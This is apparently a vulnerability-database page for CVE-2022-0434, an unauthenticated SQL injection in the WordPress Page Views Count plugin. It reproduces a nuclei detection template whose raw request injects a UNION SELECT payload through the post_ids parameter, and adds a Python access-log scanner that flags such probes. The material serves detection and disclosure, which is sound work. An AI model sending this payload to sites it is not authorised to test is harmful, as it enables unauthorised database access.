
WordPress Page Views Count <2.4.15 - SQL Injection

🗓️ 03 Jul 2026 03:01:05 · Reported by ProjectDiscovery · Type: nuclei · 🔗 github.com

WordPress Page Views Count <2.4.15 - SQL Injection. An unauthenticated SQL injection vulnerability allows unauthorized access to the WordPress database.

Related

Reporter | Title | Published | Family
ATTACKERKB | CVE-2022-0434 | 7 Mar 2022 09:15 | attackerkb
Circl | CVE-2022-0434 | 8 Jul 2025 21:02 | circl
CNNVD | WordPress plugin Page View Count SQL injection vulnerability | 7 Mar 2022 00:00 | cnnvd
CVE | CVE-2022-0434 | 7 Mar 2022 08:16 | cve
Cvelist | CVE-2022-0434 Page Views Count < 2.4.15 - Unauthenticated SQL Injection | 7 Mar 2022 08:16 | cvelist
NVD | CVE-2022-0434 | 7 Mar 2022 09:15 | nvd
OSV | CVE-2022-0434 | 7 Mar 2022 09:15 | osv
Patchstack | WordPress Page View Count plugin <= 2.4.14 - Unauthenticated SQL Injection (SQLi) vulnerability | 1 Feb 2022 00:00 | patchstack
Prion | Sql injection | 7 Mar 2022 09:15 | prion
RedhatCVE | CVE-2022-0434 | 9 Jan 2026 10:45 | redhatcve

id: CVE-2022-0434

info:
  name: WordPress Page Views Count <2.4.15 - SQL Injection
  author: theamanrawat
  severity: critical
  description: |
    WordPress Page Views Count plugin prior to 2.4.15 contains an unauthenticated SQL injection vulnerability.  It does not sanitise and escape the post_ids parameter before using it in a SQL statement via a REST endpoint. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
  impact: |
    Successful exploitation of this vulnerability could lead to unauthorized access to the WordPress database.
  remediation: |
    Update to the latest version of the WordPress Page Views Count plugin (2.4.15) to mitigate the SQL Injection vulnerability.
  reference:
    - https://wpscan.com/vulnerability/be895016-7365-4ce4-a54f-f36d0ef2d6f1
    - https://wordpress.org/plugins/page-views-count/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-0434
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-0434
    cwe-id: CWE-89
    epss-score: 0.14783
    epss-percentile: 0.96271
    cpe: cpe:2.3:a:a3rev:page_view_count:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: a3rev
    product: page_view_count
    framework: wordpress
  tags: cve,cve2022,wordpress,wp-plugin,wp,sqli,wpscan,unauth,a3rev,vkev,vuln
variables:
  num: "999999999"

http:
  - raw:
      - |
        GET /?rest_route=/pvc/v1/increase/1&post_ids=0)%20union%20select%20md5({{num}}),null,null%20--%20g HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '{{md5(num)}}'

      - type: status
        status:
          - 200
# digest: 490a00463044022052d2f8c5263a647c98082a593b1c89ff41a4f8732e90a1c91ba8f8b16ffefaf7022073791243686ce2f5188d6d58278ae98459fe40a1392977ba2584b5a29715f2b0:922c64590222798bb761d5b6d8e72950
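
For defenders, one way to look for requests like the template's probe in web server access logs, as an added example that is not part of the template or the plugin. It assumes combined-format access logs and that legitimate `post_ids` values are comma-separated integers; the function name and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Assumption: benign post_ids values are comma-separated integers.
BENIGN_IDS = re.compile(r"^\d+(,\d+)*$")
# Request line inside a combined-format access log entry.
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
ROUTE = "/pvc/v1/increase/"  # REST route named in the template above

# Constructed sample log lines (documentation IP ranges, made-up timestamps).
SAMPLE = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /?rest_route=/pvc/v1/increase/1'
    '&post_ids=0)%20union%20select%20md5(999999999),null,null%20--%20g HTTP/1.1" 200 512 "-" "-"',
    '198.51.100.4 - - [01/Jan/2024:10:00:05 +0000] "GET /?rest_route=/pvc/v1/increase/1'
    '&post_ids=12,15 HTTP/1.1" 200 88 "-" "-"',
    '198.51.100.9 - - [01/Jan/2024:10:00:09 +0000] "GET /wp-json/wp/v2/posts?post_ids=x'
    ' HTTP/1.1" 200 90 "-" "-"',
]

def suspicious_pvc_requests(lines):
    """Return (client_ip, decoded post_ids) for pvc/v1/increase calls with non-numeric post_ids."""
    hits = []
    for line in lines:
        m = REQUEST.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        # parse_qs percent-decodes values, so encoded payloads are compared in clear form.
        query = parse_qs(url.query, keep_blank_values=True)
        # The route can arrive as ?rest_route=... or as a /wp-json/... path.
        route = query.get("rest_route", [""])[0] or unquote(url.path)
        if ROUTE not in route:
            continue
        for value in query.get("post_ids", []):
            if not BENIGN_IDS.match(value):
                hits.append((line.split(" ", 1)[0], value))
    return hits

if __name__ == "__main__":
    for ip, value in suspicious_pvc_requests(SAMPLE):
        print(f"{ip} sent non-numeric post_ids: {value!r}")
```

A hit only shows that the endpoint was probed; whether the site was affected depends on the installed plugin version, which the template's remediation field puts at 2.4.15 for the fix.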

04 Feb 2026 07:00 (current)
Vulners AI Score: 7.3 (High risk)
CVSS 2: 7.5
CVSS 3.1: 9.8
EPSS: 0.14783